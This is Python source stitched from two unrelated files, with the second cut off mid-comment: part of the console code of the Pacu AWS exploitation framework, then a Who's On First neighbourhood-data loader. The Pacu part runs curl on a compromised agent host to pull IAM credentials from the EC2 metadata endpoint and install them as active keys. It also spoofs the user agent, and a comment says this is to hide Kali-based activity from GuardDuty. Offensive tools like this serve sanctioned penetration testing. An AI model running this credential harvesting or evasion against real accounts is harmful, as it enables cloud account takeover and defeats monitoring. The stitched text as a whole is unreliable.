if not isinstance(summary, str):
raise TypeError(' The {} module\'s summary is {}-type instead of str. Make summary return a string.'.format(module.module_info['name'], type(summary)))
self.print('{} completed.\n'.format(module.module_info['name']))
self.print('MODULE SUMMARY:\n\n{}\n'.format(summary.strip('\n')))
except SystemExit as error:
exception_type, exception_value, tb = sys.exc_info()
if 'SIGINT called' in exception_value.args:
self.print('^C\nExiting the currently running module.')
else:
traceback_text = '\nTraceback (most recent call last):\n{}{}: {}\n\n'.format(''.join(traceback.format_tb(tb)), str(exception_type), str(exception_value))
session, global_data, local_data = self.get_data_from_traceback(tb)
self.log_error(
traceback_text,
exception_info='{}: {}\n\nPacu caught a SystemExit error. '.format(exception_type, exception_value),
session=session,
local_data=local_data,
global_data=global_data
)
finally:
self.running_module_names.pop()
elif module_name in self.COMMANDS:
print('Error: "{}" is the name of a Pacu command, not a module. Try using it without "run" or "exec" in front.'.format(module_name))
else:
print('Module not found. Is it spelled correctly? Try using the module search function.')
def display_command_help(self, command_name):
if command_name == 'proxy':
self.display_proxy_help()
elif command_name == 'list' or command_name == 'ls':
print('\n list/ls\n List all modules\n')
elif command_name == 'import_keys':
print('\n import_keys <profile name>|--all\n Import AWS keys from the AWS CLI credentials file (located at ~/.aws/credentials) to the current sessions database. Enter the name of a profile you would like to import or supply --all to import all the credentials in the file.\n')
elif command_name == 'aws':
print('\n aws <command>\n Use the AWS CLI directly. This command runs in your local shell to use the AWS CLI. Warning: The AWS CLI\'s authentication is not related to Pacu. Be careful to ensure that you are using the keys you want when using the AWS CLI. It is suggested to use AWS CLI profiles to help solve this problem\n')
elif command_name == 'search':
print('\n search [cat[egory]] <search term>\n Search the list of available modules by name or category\n')
elif command_name == 'help':
print('\n help\n Display information about all Pacu commands\n help <module name>\n Display information about a module\n')
elif command_name == 'whoami':
print('\n  whoami\n    Display information regarding the active access keys\n')
elif command_name == 'data':
print('\n data\n Display all data that is stored in this session. Only fields with values will be displayed\n data <service>|proxy\n Display all data for a specified service or for PacuProxy in this session\n')
elif command_name == 'services':
print('\n services\n Display a list of services that have collected data in the current session to use with the "data"\n command\n')
elif command_name == 'regions':
print('\n regions\n Display a list of all valid AWS regions\n')
elif command_name == 'update_regions':
print('\n update_regions\n Run a script to update the regions database to the newest version\n')
elif command_name == 'set_regions':
print('\n set_regions <region> [<region>...]\n Set the default regions for this session. These space-separated regions will be used for modules where\n regions are required, but not supplied by the user. The default set of regions is every supported\n region for the service. Supply "all" to this command to reset the region set to the default of all\n supported regions\n')
elif command_name == 'run' or command_name == 'exec':
print('\n run/exec <module name>\n Execute a module\n')
elif command_name == 'set_keys':
print('\n set_keys\n Add a set of AWS keys to the session and set them as the default\n')
elif command_name == 'swap_keys':
print('\n swap_keys\n Change the currently active AWS key to another key that has previously been set for this session\n')
elif command_name == 'exit' or command_name == 'quit':
print('\n exit/quit\n Exit Pacu\n')
elif command_name == 'load_commands_file':
print('\n load_commands_file <commands_file>\n Load an existing file with a set of commands to execute')
else:
print('Command or module not found. Is it spelled correctly? Try using the module search function.')
return
def display_module_help(self, module_name):
module = self.import_module_by_name(module_name, include=['module_info', 'parser'])
if module is not None:
print('\n{} written by {}.\n'.format(module.module_info['name'], module.module_info['author']))
if 'prerequisite_modules' in module.module_info and len(module.module_info['prerequisite_modules']) > 0:
print('Prerequisite Module(s): {}\n'.format(module.module_info['prerequisite_modules']))
if 'external_dependencies' in module.module_info and len(module.module_info['external_dependencies']) > 0:
print('External dependencies: {}\n'.format(module.module_info['external_dependencies']))
parser_help = module.parser.format_help()
print(parser_help.replace(os.path.basename(__file__), 'run {}'.format(module.module_info['name']), 1))
return
else:
print('Command or module not found. Is it spelled correctly? Try using the module search function, or "help" to view a list of commands.')
return
def list_modules(self, search_term, by_category=False):
found_modules_by_category = dict()
current_directory = os.getcwd()
for root, directories, files in os.walk('{}/modules'.format(current_directory)):
modules_directory_path = os.path.realpath('{}/modules'.format(current_directory))
specific_module_directory = os.path.realpath(root)
# Skip any directories inside module directories.
if os.path.dirname(specific_module_directory) != modules_directory_path:
continue
# Skip the root directory.
elif modules_directory_path == specific_module_directory:
continue
module_name = os.path.basename(root)
for file in files:
if file == 'main.py':
# Make sure the format is correct
module_path = 'modules/{}/main'.format(module_name).replace('/', '.').replace('\\', '.')
# Import the help function from the module
module = __import__(module_path, globals(), locals(), ['module_info'], 0)
importlib.reload(module)
category = module.module_info['category']
services = module.module_info['services']
regions = []
for service in services:
regions += self.get_regions(service)
# Skip modules with no regions in the list of set regions.
if len(regions) == 0:
continue
# Searching for modules by category:
if by_category and search_term in category:
if category not in found_modules_by_category.keys():
found_modules_by_category[category] = list()
found_modules_by_category[category].append(' {}'.format(module_name))
if search_term:
found_modules_by_category[category].append(' {}\n'.format(module.module_info['one_liner']))
# Searching or listing modules without specifying a category:
elif not by_category and search_term in module_name:
if category not in found_modules_by_category.keys():
found_modules_by_category[category] = list()
found_modules_by_category[category].append(' {}'.format(module_name))
if search_term:
found_modules_by_category[category].append(' {}\n'.format(module.module_info['one_liner']))
if found_modules_by_category:
PRINT_ORDER = ['RECON_UNAUTH', 'ENUM', 'ESCALATE', 'LATERAL_MOVE', 'EXPLOIT', 'PERSIST', 'EXFIL', 'EVADE']
for category in PRINT_ORDER:
if category in found_modules_by_category:
search_results = '\n'.join(found_modules_by_category[category]).strip('\n')
print('\n[Category: {}]\n\n{}'.format(category, search_results))
else:
print('\nNo modules found.')
print()
def fetch_ec2_keys(self, target, conn):
instance_profile = self.server.run_cmd(target, conn, 'curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/', mute=True)
if not instance_profile == '' and 'not found' not in instance_profile:
keys = self.server.run_cmd(target, conn, 'curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/{}'.format(instance_profile), mute=True)
if '"Code" : "Success",' in keys:
keys = json.loads(keys)
self.set_keys('Agent{}/{}'.format(target, time.strftime("%m-%d@%I-%M%p")), keys['AccessKeyId'], keys['SecretAccessKey'], keys['Token'])
self.print('Keys successfully fetched from agent {}\'s EC2 meta-data and set as the active key pair. They will expire at {}.\n'.format(target, keys["Expiration"]))
return
self.print('Failed to fetch AWS keys, target is either not an EC2 instance or it does not have a valid instance profile attached to it.\n')
return
def set_keys(self, key_alias=None, access_key_id=None, secret_access_key=None, session_token=None):
session = self.get_active_session()
# If key_alias is None, then it's being run normally from the command line (set_keys),
# otherwise it is being set programmatically and we don't want any prompts
if key_alias is None:
self.print('Setting AWS Keys...')
self.print('Press enter to keep the value currently stored.')
self.print('Enter the letter C to clear the value, rather than set it.')
self.print('If you enter an existing key_alias, that key\'s fields will be updated instead of added.\n')
# Key alias
if key_alias is None:
new_value = self.input('Key alias [{}]: '.format(session.key_alias))
else:
new_value = key_alias.strip()
self.print('Key alias [{}]: {}'.format(session.key_alias, new_value), output='file')
if str(new_value.strip().lower()) == 'c':
session.key_alias = None
elif str(new_value) != '':
session.key_alias = new_value.strip()
# Access key ID
if key_alias is None:
new_value = self.input('Access key ID [{}]: '.format(session.access_key_id))
else:
new_value = access_key_id
self.print('Access key ID [{}]: {}'.format(session.access_key_id, new_value), output='file')
if str(new_value.strip().lower()) == 'c':
session.access_key_id = None
elif str(new_value) != '':
session.access_key_id = new_value.strip()
# Secret access key (should not be entered in log files)
if key_alias is None:
if session.secret_access_key is None:
new_value = input('Secret access key [None]: ')
else:
new_value = input('Secret access key [{}{}]: '.format(session.secret_access_key[0:int(len(session.secret_access_key) / 2)], '*' * int(len(session.secret_access_key) / 2)))
else:
new_value = secret_access_key
self.print('Secret access key [******]: ****** (Censored)', output='file')
if str(new_value.strip().lower()) == 'c':
session.secret_access_key = None
elif str(new_value) != '':
session.secret_access_key = new_value.strip()
# Session token (optional)
if key_alias is None:
new_value = self.input('Session token (Optional - for temp AWS keys only) [{}]: '.format(session.session_token))
else:
new_value = session_token
if new_value is None:
new_value = 'c'
self.print('Session token [{}]: {}'.format(session.session_token, new_value), output='file')
if str(new_value.strip().lower()) == 'c':
session.session_token = None
elif str(new_value) != '':
session.session_token = new_value.strip()
self.database.add(session)
aws_key = session.get_active_aws_key(self.database)
if aws_key:
aws_key.key_alias = session.key_alias
aws_key.access_key_id = session.access_key_id
aws_key.secret_access_key = session.secret_access_key
aws_key.session_token = session.session_token
else:
aws_key = AWSKey(
session=session,
key_alias=session.key_alias,
access_key_id=session.access_key_id,
secret_access_key=session.secret_access_key,
session_token=session.session_token
)
self.database.add(aws_key)
self.database.commit()
if key_alias is None:
self.print('\nKeys saved to database.\n')
def swap_keys(self):
session = self.get_active_session()
aws_keys = session.aws_keys.all()
if not aws_keys:
self.print('\nNo AWS keys set for this session. Run "set_keys" to add AWS keys.\n')
return
self.print('\nSwapping AWS Keys. Press enter to keep the currently active key.')
print('AWS keys in this session:')
for index, aws_key in enumerate(aws_keys, 1):
if aws_key.key_alias == session.key_alias:
print(' [{}] {} (ACTIVE)'.format(index, aws_key.key_alias))
else:
print(' [{}] {}'.format(index, aws_key.key_alias))
choice = input('Choose an option: ')
if not str(choice).strip():
self.print('The currently active AWS key will remain active. ({})'.format(session.key_alias))
return
if not choice.isdigit() or int(choice) not in range(1, len(aws_keys) + 1):
print('Please choose a number from 1 to {}.'.format(len(aws_keys)))
return self.swap_keys()
chosen_key = aws_keys[int(choice) - 1]
session.key_alias = chosen_key.key_alias
session.access_key_id = chosen_key.access_key_id
session.secret_access_key = chosen_key.secret_access_key
session.session_token = chosen_key.session_token
self.database.add(session)
self.database.commit()
self.print('AWS key is now {}.'.format(session.key_alias))
def check_sessions(self):
sessions = self.database.query(PacuSession).all()
if not sessions:
session = self.new_session()
else:
print('Found existing sessions:')
print(' [0] New session')
for index, session in enumerate(sessions, 1):
print(' [{}] {}'.format(index, session.name))
choice = input('Choose an option: ')
try:
if int(choice) == 0:
session = self.new_session()
else:
session = sessions[int(choice) - 1]
except (ValueError, IndexError):
print('Please choose a number from 0 to {}.'.format(len(sessions)))
return self.check_sessions()
session.activate(self.database)
def new_session(self):
session_data = dict()
name = None
while not name:
name = input('What would you like to name this new session? ').strip()
if not name:
print('A session name is required.')
else:
existing_sessions = self.database.query(PacuSession).filter(PacuSession.name == name).all()
if existing_sessions:
print('A session with that name already exists.')
name = None
session_data['name'] = name
session = PacuSession(**session_data)
self.database.add(session)
self.database.commit()
session_downloads_directory = './sessions/{}/downloads/'.format(name)
if not os.path.exists(session_downloads_directory):
os.makedirs(session_downloads_directory)
print('Session {} created.'.format(name))
return session
def get_data_from_traceback(self, tb):
session = None
global_data_in_all_frames = list()
local_data_in_all_frames = list()
for frame, line_number in traceback.walk_tb(tb):
global_data_in_all_frames.append(str(frame.f_globals))
local_data_in_all_frames.append(str(frame.f_locals))
# Save the most recent PacuSession called "session", working backwards.
if session is None:
session = frame.f_locals.get('session', None)
if not isinstance(session, PacuSession):
session = None
return session, global_data_in_all_frames, local_data_in_all_frames
def check_user_agent(self):
session = self.get_active_session()
if session.boto_user_agent is None: # If there is no user agent set for this session already
boto3_session = boto3.session.Session()
ua = boto3_session._session.user_agent()
if 'kali' in ua.lower() or 'parrot' in ua.lower() or 'pentoo' in ua.lower(): # If the local OS is Kali/Parrot/Pentoo Linux
# GuardDuty triggers a finding around API calls made from Kali Linux, so let's avoid that...
self.print('Detected environment as one of Kali/Parrot/Pentoo Linux. Modifying user agent to hide that from GuardDuty...')
with open('./user_agents.txt', 'r') as file:
user_agents = file.readlines()
user_agents = [agent.strip() for agent in user_agents] # Remove random \n's and spaces
new_ua = random.choice(user_agents)
session.update(self.database, boto_user_agent=new_ua)
self.print(' User agent for this session set to:')
self.print(' {}'.format(new_ua))
def get_boto3_client(self, service, region=None, user_agent=None, socks_port=8001, parameter_validation=True):
session = self.get_active_session()
proxy_settings = self.get_proxy_settings()
# If there is not a custom user_agent passed into this function
# and session.boto_user_agent is set, use that as the user agent
# for this client. If both are set, the incoming user_agent will
# override the session.boto_user_agent. If neither is set, it
# will be None, and will default to the OS's regular user agent
if user_agent is None and session.boto_user_agent is not None:
user_agent = session.boto_user_agent
boto_config = botocore.config.Config(
proxies={'https': 'socks5://127.0.0.1:{}'.format(socks_port), 'http': 'socks5://127.0.0.1:{}'.format(socks_port)} if not proxy_settings.target_agent == [] else None,
user_agent=user_agent, # If user_agent=None, botocore will use the real UA which is what we want
parameter_validation=parameter_validation
)
return boto3.client(
service,
region_name=region, # Whether region has a value or is None, it will work here
aws_access_key_id=session.access_key_id,
aws_secret_access_key=session.secret_access_key,
aws_session_token=session.session_token,
config=boto_config
)
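# A minimal usage sketch (hypothetical call sites; the service/region values are examples):
#   lambda_client = self.get_boto3_client('lambda', 'us-east-1')
#   ec2 = self.get_boto3_client('ec2', region='us-west-2', parameter_validation=False)
# Both clients inherit the session's keys, the (possibly spoofed) user agent, and the
# SOCKS proxy configuration when a PacuProxy agent is in use.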
def get_boto3_resource(self, service, region=None, user_agent=None, socks_port=8001, parameter_validation=True):
# All the comments from get_boto3_client apply here too
session = self.get_active_session()
proxy_settings = self.get_proxy_settings()
if user_agent is None and session.boto_user_agent is not None:
user_agent = session.boto_user_agent
boto_config = botocore.config.Config(
proxies={'https': 'socks5://127.0.0.1:{}'.format(socks_port), 'http': 'socks5://127.0.0.1:{}'.format(socks_port)} if not proxy_settings.target_agent == [] else None,
user_agent=user_agent,
parameter_validation=parameter_validation
)
return boto3.resource(
service,
region_name=region,
aws_access_key_id=session.access_key_id,
aws_secret_access_key=session.secret_access_key,
aws_session_token=session.session_token,
config=boto_config
)
def initialize_tab_completion(self):
try:
import readline
# Big thanks to samplebias: https://stackoverflow.com/a/5638688
MODULES = []
CATEGORIES = []
for root, directories, files in os.walk('{}/modules'.format(os.getcwd())):
modules_directory_path = os.path.realpath('{}/modules'.format(os.getcwd()))
category_path = os.path.realpath(root)
# Skip any directories inside module directories.
if os.path.dirname(category_path) != modules_directory_path:
continue
# Skip the root directory.
elif modules_directory_path == category_path:
continue
for file in files:
if file == 'main.py':
module_name = os.path.basename(root)
MODULES.append(module_name)
# Make sure the format is correct
module_path = 'modules/{}/main'.format(module_name).replace('/', '.').replace('\\', '.')
# Import the help function from the module
module = __import__(module_path, globals(), locals(), ['module_info'], 0)
importlib.reload(module)
CATEGORIES.append(module.module_info['category'])
RE_SPACE = re.compile(r'.*\s+$', re.M)
readline.set_completer_delims(' \t\n`~!@#$%^&*()=+[{]}\\|;:\'",<>/?')
class Completer(object):
def complete(completer, text, state):
buffer = readline.get_line_buffer()
line = readline.get_line_buffer().split()
# If nothing has been typed, show all commands. If help, exec, or run has been typed, show all modules
if not line:
return [c + ' ' for c in self.COMMANDS][state]
if len(line) == 1 and (line[0] == 'help'):
return [c + ' ' for c in MODULES + self.COMMANDS][state]
if len(line) == 1 and (line[0] == 'exec' or line[0] == 'run'):
return [c + ' ' for c in MODULES][state]
# account for last argument ending in a space
if RE_SPACE.match(buffer):
line.append('')
# Resolve command to the implementation function
if len(line) == 1:
cmd = line[0].strip()
results = [c + ' ' for c in self.COMMANDS if c.startswith(cmd)] + [None]
elif len(line) == 2:
cmd = line[1].strip()
if line[0].strip() == 'search':
results = [c + ' ' for c in MODULES + ['category'] if c.startswith(cmd)] + [None]
elif line[0].strip() == 'help':
results = [c + ' ' for c in MODULES + self.COMMANDS if c.startswith(cmd)] + [None]
else:
results = [c + ' ' for c in MODULES if c.startswith(cmd)] + [None]
elif len(line) == 3 and line[0] == 'search' and line[1] in ('cat', 'category'):
cmd = line[2].strip()
results = [c + ' ' for c in CATEGORIES if c.startswith(cmd)] + [None]
elif len(line) >= 3:
if line[0].strip() == 'run' or line[0].strip() == 'exec':
module_name = line[1].strip()
module = self.import_module_by_name(module_name, include=['module_info'])
autocomplete_arguments = module.module_info.get('arguments_to_autocomplete', list())
current_argument = line[-1].strip()
results = [c + ' ' for c in autocomplete_arguments if c.startswith(current_argument)] + [None]
return results[state]
comp = Completer()
readline.parse_and_bind("tab: complete")
readline.set_completer(comp.complete)
except Exception as error:
# Error means most likely on Windows where readline is not supported
# TODO: Implement tab-completion for Windows
# print(error)
pass
def exit(self):
sys.exit('SIGINT called')
def idle(self):
session = self.get_active_session()
if session.key_alias:
alias = session.key_alias
else:
alias = 'No Keys Set'
command = input('Pacu ({}:{}) > '.format(session.name, alias))
self.parse_command(command)
self.idle()
def run(self):
idle_ready = False
while True:
try:
if not idle_ready:
try:
print("""
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣤⣶⣿⣿⣿⣿⣿⣿⣶⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⡿⠛⠉⠁⠀⠀⠈⠙⠻⣿⣿⣦⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠛⠛⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⣿⣷⣀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣤⣤⣤⣤⣤⣤⣤⣤⣀⣀⠀⠀⠀⠀⠀⠀⢻⣿⣿⣿⡿⣿⣿⣷⣦⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣀⣈⣉⣙⣛⣿⣿⣿⣿⣿⣿⣿⣿⡟⠛⠿⢿⣿⣷⣦⣄⠀⠀⠈⠛⠋⠀⠀⠀⠈⠻⣿⣷⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣈⣉⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣧⣀⣀⣀⣤⣿⣿⣿⣷⣦⡀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣆⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣬⣭⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠛⢛⣉⣉⣡⣄⠀⠀⠀⠀⠀⠀⠀⠀⠻⢿⣿⣿⣶⣄⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠋⣁⣤⣶⡿⣿⣿⠉⠻⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⢻⣿⣧⡀
⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠋⣠⣶⣿⡟⠻⣿⠃⠈⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣿⣧
⢀⣀⣤⣴⣶⣶⣶⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠁⢠⣾⣿⠉⠻⠇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿
⠉⠛⠿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠁⠀⠀⠀⠀⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⡟
⠀⠀⠀⠀⠉⣻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⣿⡟⠁
⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⣄⡀⠀⠀⠀⠀⠀⣴⣆⢀⣴⣆⠀⣼⣆⠀⠀⣶⣶⣶⣶⣶⣶⣶⣶⣾⣿⣿⠿⠋⠀⠀
⠀⠀⠀⣼⣿⣿⣿⠿⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠓⠒⠒⠚⠛⠛⠛⠛⠛⠛⠛⠛⠀⠀⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠀⠀⠀⠀⠀
⠀⠀⠀⣿⣿⠟⠁⠀⢸⣿⣿⣿⣿⣿⣿⣿⣶⡀⠀⢠⣾⣿⣿⣿⣿⣿⣿⣷⡄⠀⢀⣾⣿⣿⣿⣿⣿⣿⣷⣆⠀⢰⣿⣿⣿⠀⠀⠀⣿⣿⣿
⠀⠀⠀⠘⠁⠀⠀⠀⢸⣿⣿⡿⠛⠛⢻⣿⣿⡇⠀⢸⣿⣿⡿⠛⠛⢿⣿⣿⡇⠀⢸⣿⣿⡿⠛⠛⢻⣿⣿⣿⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⠸⠿⠿⠟⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣧⣤⣤⣼⣿⣿⡇⠀⢸⣿⣿⣧⣤⣤⣼⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⡿⠃⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⢀⣀⣀⣀⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡏⠉⠉⠉⠉⠀⠀⠀⢸⣿⣿⡏⠉⠉⢹⣿⣿⡇⠀⢸⣿⣿⣇⣀⣀⣸⣿⣿⣿⠀⢸⣿⣿⣿⣀⣀⣀⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⠸⣿⣿⣿⣿⣿⣿⣿⣿⡿⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⡟
⠀⠀⠀⠀⠀⠀⠀⠀⠘⠛⠛⠃⠀⠀⠀⠀⠀⠀⠀⠘⠛⠛⠃⠀⠀⠘⠛⠛⠃⠀⠀⠉⠛⠛⠛⠛⠛⠛⠋⠀⠀⠀⠀⠙⠛⠛⠛⠛⠛⠉⠀
""")
except UnicodeEncodeError as error:
pass
configure_settings.copy_settings_template_into_settings_file_if_not_present()
set_sigint_handler(exit_text='\nA database must be created for Pacu to work properly.')
setup_database_if_not_present(settings.DATABASE_FILE_PATH)
set_sigint_handler(exit_text=None, value='SIGINT called')
self.database = get_database_connection(settings.DATABASE_CONNECTION_PATH)
self.server = PacuProxy()
self.proxy = ProxySettings()
self.queue = Queue()
self.check_sessions()
self.initialize_tab_completion()
self.display_pacu_help()
proxy_settings = self.get_proxy_settings()
if proxy_settings is None:
self.proxy.activate(self.database)
proxy_settings = self.get_proxy_settings()
if proxy_settings is not None and proxy_settings.listening is True:
# PacuProxy was listening on last shutdown, so restart it
self.print('Auto-starting PacuProxy listener from previous session on {}:{}...'.format(proxy_settings.ip, proxy_settings.port))
self.start_proxy()
idle_ready = True
self.check_user_agent()
self.idle()
except (Exception, SystemExit) as error:
exception_type, exception_value, tb = sys.exc_info()
if exception_type == SystemExit:
if 'SIGINT called' in exception_value.args:
print('\nBye!')
return
else:
traceback_text = '\nTraceback (most recent call last):\n{}{}: {}\n\n'.format(''.join(traceback.format_tb(tb)), str(exception_type), str(exception_value))
session, global_data, local_data = self.get_data_from_traceback(tb)
self.log_error(
traceback_text,
exception_info='{}: {}\n\nPacu caught a SystemExit error. This may be due to incorrect module arguments received by argparse in the module itself. Check to see if any required arguments are not being received by the module when it executes.'.format(exception_type, exception_value),
session=session,
local_data=local_data,
global_data=global_data
)
else:
traceback_text = '\nTraceback (most recent call last):\n{}{}: {}\n\n'.format(''.join(traceback.format_tb(tb)), str(exception_type), str(exception_value))
session, global_data, local_data = self.get_data_from_traceback(tb)
self.log_error(
traceback_text,
exception_info='{}: {}'.format(exception_type, exception_value),
session=session,
local_data=local_data,
global_data=global_data
)
if not idle_ready:
print('Pacu is unable to start. Try backing up Pacu\'s sqlite.db file and deleting the old version. If the error persists, try reinstalling Pacu in a new directory.')
return
if __name__ == '__main__':
Main().run()
|
wof.py
|
from __future__ import absolute_import
from collections import namedtuple
from contextlib import closing
from cStringIO import StringIO
from datetime import datetime
from edtf import parse_edtf
from operator import attrgetter
from psycopg2.extras import register_hstore
from shapely import geos
from tilequeue.tile import coord_marshall_int
from tilequeue.tile import coord_unmarshall_int
from tilequeue.tile import mercator_point_to_coord
from tilequeue.tile import reproject_lnglat_to_mercator
import csv
import json
import os.path
import psycopg2
import Queue
import requests
import shapely.geometry
import shapely.ops
import shapely.wkb
import threading
DATABASE_SRID = 3857
def generate_csv_lines(requests_result):
for line in requests_result.iter_lines():
if line:
yield line
neighbourhood_placetypes_to_int = dict(
neighbourhood=1,
microhood=2,
macrohood=3,
borough=4,
)
neighbourhood_int_to_placetypes = {
1: 'neighbourhood',
2: 'microhood',
3: 'macrohood',
4: 'borough',
}
NeighbourhoodMeta = namedtuple(
'NeighbourhoodMeta',
'wof_id placetype name hash label_position')
Neighbourhood = namedtuple(
'Neighbourhood',
'wof_id placetype name hash label_position geometry n_photos area '
'min_zoom max_zoom is_landuse_aoi inception cessation l10n_names '
'wikidata')
def parse_neighbourhood_meta_csv(csv_line_generator, placetype):
reader = csv.reader(csv_line_generator)
it = iter(reader)
header = it.next()
lbl_lat_idx = header.index('lbl_latitude')
lbl_lng_idx = header.index('lbl_longitude')
name_idx = header.index('name')
wof_id_idx = header.index('id')
hash_idx = header.index('file_hash')
superseded_by_idx = header.index('superseded_by')
min_row_length = (max(
lbl_lat_idx, lbl_lng_idx, name_idx, wof_id_idx, hash_idx,
superseded_by_idx) + 1)
for row in it:
if len(row) < min_row_length:
continue
superseded_by = row[superseded_by_idx]
if superseded_by:
continue
wof_id_str = row[wof_id_idx]
if not wof_id_str:
continue
try:
wof_id = int(wof_id_str)
except ValueError:
continue
name = row[name_idx]
if not name:
continue
lat_str = row[lbl_lat_idx]
lng_str = row[lbl_lng_idx]
try:
lat = float(lat_str)
lng = float(lng_str)
except ValueError:
continue
file_hash = row[hash_idx]
label_x, label_y = reproject_lnglat_to_mercator(lng, lat)
label_position = shapely.geometry.Point(label_x, label_y)
neighbourhood_meta = NeighbourhoodMeta(
wof_id, placetype, name, file_hash, label_position)
yield neighbourhood_meta
def _make_requests_session_with_retries(max_retries):
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util import Retry
s = requests.Session()
a = HTTPAdapter(
max_retries=Retry(
total=max_retries,
status_forcelist=[ # this is a list of statuses to consider to be
# an error and retry.
429, # Too many requests (i.e: back off)
500, # Generic internal server error
502, # Bad Gateway - i.e: upstream failure
503, # Unavailable, temporarily
504, # Gateway timeout
522 # Origin connection timed out
],
backoff_factor=1.0 # back off for 0s, 1s, 3s, 7s, etc... after
# each successive failure. (factor*(2^N-1))
))
# use retry for both HTTP and HTTPS connections.
s.mount('http://', a)
s.mount('https://', a)
return s
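# A minimal usage sketch (hypothetical URL), showing how callers below use the session:
#   s = _make_requests_session_with_retries(max_retries=3)
#   r = s.get('https://example.org/wof-neighbourhoods.csv', stream=True)
#   assert r.status_code == 200
# Requests that fail with one of the statuses listed above are retried with exponential
# backoff before the response is handed back to the caller.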
def fetch_wof_url_meta_neighbourhoods(url, placetype, max_retries):
s = _make_requests_session_with_retries(max_retries)
r = s.get(url, stream=True)
assert r.status_code == 200, 'Failure requesting: %s' % url
csv_line_generator = generate_csv_lines(r)
return parse_neighbourhood_meta_csv(csv_line_generator, placetype)
class NeighbourhoodFailure(object):
def __init__(self, wof_id, reason, message, halt=False, skipped=False,
funky=False, superseded=False):
# halt is a signal that threads should stop fetching. This
# would happen during a network IO error or when we get an
# unexpected http response when fetching raw json files. In
# some scenarios this could be recoverable, but because that
# isn't always the case we assume that we should stop further
# requests for more raw json files, and just process what we
# have so far.
# skipped means that we won't log this failure, ie there was
# an earlier "halt" error and processing of further records
# has stopped.
# funky is a signal downstream that this is a "soft" or
# expected failure, in the sense that it only means that we
# should skip the record, but we didn't actually detect any
# errors with the processing
# superseded is set when the json has a value for
# wof:superseded. This would indicate a data inconsistency
# because the meta csv file didn't have it set if we're trying
# to fetch the raw json in the first place. But this is meant
